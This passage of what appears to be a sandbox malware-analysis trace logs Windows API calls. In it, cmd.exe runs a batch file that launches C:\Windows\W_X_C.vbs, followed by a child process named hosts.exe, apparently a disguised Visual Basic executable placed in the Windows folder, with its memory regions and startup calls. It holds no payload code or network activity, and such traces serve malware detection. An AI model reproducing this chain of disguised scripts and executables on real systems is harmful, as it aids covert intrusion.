InitializeProcThreadAttributeList (in: lpAttributeList=0x6251c8, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x172b0c | out: lpAttributeList=0x6251c8, lpSize=0x172b0c) returned 1 [0135.517] UpdateProcThreadAttribute (in: lpAttributeList=0x6251c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x172ae4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x6251c8, lpPreviousValue=0x0) returned 1 [0135.517] CreateProcessW (in: lpApplicationName="C:\\Windows\\W_X_C.vbs", lpCommandLine="W_X_C.vbs ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x172a9c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x7, hStdError=0xb), lpProcessInformation=0x172af4 | out: lpCommandLine="W_X_C.vbs ", lpProcessInformation=0x172af4*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0135.518] DeleteProcThreadAttributeList (in: lpAttributeList=0x6251c8 | out: lpAttributeList=0x6251c8) [0135.518] GetProcessHeap () returned 0x610000 [0135.518] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6251c8 | out: hHeap=0x610000) returned 1 [0135.518] GetLastError () returned 0xc1 [0135.518] GetConsoleWindow () returned 0xa0050 [0135.519] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x75cc0000 [0135.531] GetProcAddress (hModule=0x75cc0000, lpProcName="ShellExecuteExW") returned 0x75ce1e46 [0135.531] ShellExecuteExW (in: pExecInfo=0x172a5c*(cbSize=0x3c, fMask=0x140, hwnd=0xa0050, lpVerb=0x0, lpFile="C:\\Windows\\W_X_C.vbs", lpParameters="", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x172a5c*(cbSize=0x3c, fMask=0x140, hwnd=0xa0050, lpVerb=0x0, lpFile="C:\\Windows\\W_X_C.vbs", lpParameters="", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x200)) returned 1 [0140.435] CloseHandle (hObject=0x200) returned 1 [0140.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.435] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.436] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.436] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1c41ac | out: lpMode=0x4a1c41ac) returned 1 [0140.436] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.436] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1c41b0 | out: lpMode=0x4a1c41b0) returned 1 [0140.437] SetConsoleInputExeNameW () returned 0x1 [0140.437] GetConsoleOutputCP () returned 0x1b5 [0140.437] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1c4260 | out: lpCPInfo=0x4a1c4260) returned 1 [0140.437] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.437] CreateFileW (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f404, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0140.438] _open_osfhandle (_OSFileHandle=0x200, _Flags=8) returned 3 [0140.438] _get_osfhandle (_FileHandle=3) returned 0x200 [0140.438] SetFilePointer (in: hFile=0x200, lDistanceToMove=105, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x69 [0140.438] GetProcessHeap () returned 0x610000 [0140.438] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625148 | out: hHeap=0x610000) returned 1 [0140.438] GetProcessHeap () returned 0x610000 [0140.438] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624f68 | out: hHeap=0x610000) returned 1 [0140.438] GetProcessHeap () returned 0x610000 [0140.438] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6237d8 | out: hHeap=0x610000) returned 1 [0140.438] GetProcessHeap () returned 0x610000 [0140.438] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x628dd8 | out: hHeap=0x610000) returned 1 [0140.438] GetProcessHeap () returned 0x610000 [0140.438] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6237a0 | out: hHeap=0x610000) returned 1 [0140.438] GetProcessHeap () returned 0x610000 [0140.438] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6226a0 | out: hHeap=0x610000) returned 1 [0140.439] GetProcessHeap () returned 0x610000 [0140.439] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6247d0 | out: hHeap=0x610000) returned 1 [0140.439] GetProcessHeap () returned 0x610000 [0140.439] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x611350 | out: hHeap=0x610000) returned 1 [0140.439] GetProcessHeap () returned 0x610000 [0140.439] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x623740 | out: hHeap=0x610000) returned 1 [0140.439] GetProcessHeap () returned 0x610000 [0140.439] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6236e0 | out: hHeap=0x610000) returned 1 [0140.439] _get_osfhandle (_FileHandle=3) returned 0x200 [0140.439] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x69 [0140.439] ReadFile (in: hFile=0x200, lpBuffer=0x4a1c6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f3e8, lpOverlapped=0x0 | out: lpBuffer=0x4a1c6640*, lpNumberOfBytesRead=0x18f3e8*=0xe7, lpOverlapped=0x0) returned 1 [0140.441] SetFilePointer (in: hFile=0x200, lDistanceToMove=112, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70 [0140.441] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@exit\r\n", cbMultiByte=7, lpWideCharStr=0x4a1cc640, cchWideChar=8191 | out: lpWideCharStr="@exit\r\nW_X_C.vbs\r\nhosts.exe\r\n.exe goto NOFILE\r\n") returned 7 [0140.441] _get_osfhandle (_FileHandle=3) returned 0x200 [0140.441] GetFileType (hFile=0x200) returned 0x1 [0140.441] _get_osfhandle (_FileHandle=3) returned 0x200 [0140.441] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70 [0140.441] GetProcessHeap () returned 0x610000 [0140.441] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x645c40 [0140.441] GetProcessHeap () returned 0x610000 [0140.441] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x645c40 | out: hHeap=0x610000) returned 1 [0140.443] _tell (_FileHandle=3) returned 112 [0140.443] _close (_FileHandle=3) returned 0 [0140.444] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0140.444] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0140.444] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0140.444] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0140.444] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0140.444] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0140.444] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0140.444] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0140.444] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0140.444] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0140.444] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0140.444] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0140.444] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0140.444] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0140.444] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0140.444] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0140.444] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0140.445] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0140.445] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0140.445] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0140.445] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0140.445] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0140.445] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0140.445] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0140.445] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0140.445] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0140.445] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0140.445] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0140.445] GetConsoleTitleW (in: lpConsoleTitle=0x18efcc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.554] exit (_Code=0) Thread: id = 61 os_tid = 0xaa4 Thread: id = 62 os_tid = 0xba8 Thread: id = 63 os_tid = 0xb88 Process: id = "7" image_name = "hosts.exe" filename = "c:\\windows\\hosts.exe" page_root = "0x35988000" os_pid = "0xaa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xfe0" cmd_line = "C:\\windows\\hosts.exe " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1326 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1327 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1328 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1329 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1330 start_va = 0x90000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1331 start_va = 0x290000 end_va = 0x293fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1332 start_va = 0x400000 end_va = 0xde0fff monitored = 1 entry_point = 0xdded44 region_type = mapped_file name = "hosts.exe" filename = "\\Windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe") Region: id = 1333 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1334 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1335 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1336 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1337 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1338 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1339 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1340 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1341 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1342 start_va = 0xdf0000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1343 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1344 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1345 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1346 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1347 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1348 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1349 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 1350 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1351 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 1352 start_va = 0xfe0000 end_va = 0x134ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 1353 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1360 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1361 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1362 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1363 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1364 start_va = 0x2a0000 end_va = 0x306fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1365 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1366 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1367 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1368 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1369 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1370 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1371 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1372 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1373 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1374 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1382 start_va = 0x775d0000 end_va = 0x7765efff monitored = 0 entry_point = 0x775d3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1383 start_va = 0x76c60000 end_va = 0x76dbbfff monitored = 0 entry_point = 0x76caba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1384 start_va = 0x75cc0000 end_va = 0x76909fff monitored = 0 entry_point = 0x75d41601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1385 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1386 start_va = 0x745b0000 end_va = 0x745b8fff monitored = 0 entry_point = 0x745b1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1387 start_va = 0x72940000 end_va = 0x72a92fff monitored = 1 entry_point = 0x72941af8 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 1388 start_va = 0x310000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1398 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1399 start_va = 0x1350000 end_va = 0x14d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001350000" filename = "" Region: id = 1400 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1401 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1402 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1403 start_va = 0x14e0000 end_va = 0x1660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014e0000" filename = "" Region: id = 1404 start_va = 0x1670000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001670000" filename = "" Region: id = 1406 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1407 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1408 start_va = 0x2a70000 end_va = 0x2c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 1409 start_va = 0x2c30000 end_va = 0x302ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c30000" filename = "" Region: id = 1410 start_va = 0x3030000 end_va = 0x32fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1411 start_va = 0x360000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1412 start_va = 0xdf0000 end_va = 0xecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1413 start_va = 0xf60000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Thread: id = 60 os_tid = 0xa98 [0136.086] GetVersion () returned 0x1db10106 [0136.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0136.087] GetProcAddress (hModule=0x75a80000, lpProcName="IsTNT") returned 0x0 [0136.087] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2c20000 [0136.087] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x2c30000 [0136.088] VirtualAlloc (lpAddress=0x2c30000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x2c30000 [0136.090] GetCurrentThreadId () returned 0xa98 [0136.090] GetCommandLineA () returned="C:\\windows\\hosts.exe " [0136.090] GetEnvironmentStringsW () returned 0x1165800* [0136.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\kEecfMwgj\\Desktop", cchWideChar=1516, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1516 [0136.090] RtlAllocateHeap (HeapHandle=0x2c20000, Flags=0x0, Size=0x5f0) returned 0x2c207d0 [0136.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\kEecfMwgj\\Desktop", cchWideChar=1516, lpMultiByteStr=0x2c207d0, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\kEecfMwgj\\Desktop", lpUsedDefaultChar=0x0) returned 1516 [0136.090] FreeEnvironmentStringsW (penv=0x1165800) returned 1 [0136.090] RtlAllocateHeap (HeapHandle=0x2c20000, Flags=0x0, Size=0x480) returned 0x2c20dc8 [0136.090] GetStartupInfoA (in: lpStartupInfo=0x28f9b8 | out: lpStartupInfo=0x28f9b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\windows\\hosts.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0136.090] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0136.090] GetFileType (hFile=0x0) returned 0x0 [0136.091] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0136.091] GetFileType (hFile=0x0) returned 0x0 [0136.091] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0136.091] GetFileType (hFile=0x0) returned 0x0 [0136.091] SetHandleCount (uNumber=0x20) returned 0x20 [0136.091] GetACP () returned 0x4e4 [0136.091] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28f9e0 | out: lpCPInfo=0x28f9e0) returned 1 [0136.091] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0136.093] HeapFree (in: hHeap=0x2c20000, dwFlags=0x0, lpMem=0x2c207d0 | out: hHeap=0x2c20000) returned 1 [0136.093] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75a80000 [0136.093] GetProcAddress (hModule=0x75a80000, lpProcName="IsProcessorFeaturePresent") returned 0x75a951ed [0136.093] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0136.093] RtlAllocateHeap (HeapHandle=0x2c20000, Flags=0x8, Size=0x800) returned 0x2c21250 [0136.094] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x98 [0136.094] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x9c [0136.095] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0136.095] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0136.095] GetVersion () returned 0x1db10106 [0136.095] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0136.100] GetUserDefaultLCID () returned 0x409 [0136.100] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0136.100] GetSystemMetrics (nIndex=5) returned 1 [0136.100] GetSystemMetrics (nIndex=6) returned 1 [0136.100] GetSystemMetrics (nIndex=11) returned 32 [0136.100] GetSystemMetrics (nIndex=12) returned 32 [0136.100] GetSystemMetrics (nIndex=34) returned 132 [0136.100] GetSystemMetrics (nIndex=35) returned 38 [0136.100] GetSystemMetrics (nIndex=0) returned 1440 [0136.100] GetSystemMetrics (nIndex=1) returned 900 [0136.100] GetSystemMetrics (nIndex=32) returned 8 [0136.101] GetSystemMetrics (nIndex=33) returned 8 [0136.101] GetSystemMetrics (nIndex=42) returned 0 [0136.101] GetStockObject (i=15) returned 0x188000b [0136.101] GetStockObject (i=7) returned 0x1b00017 [0136.101] GetStockObject (i=6) returned 0x1b00018 [0136.101] GetStockObject (i=8) returned 0x1b00016 [0136.101] GetStockObject (i=4) returned 0x1900011 [0136.101] GetStockObject (i=2) returned 0x1900012 [0136.101] GetStockObject (i=0) returned 0x1900010 [0136.101] GetStockObject 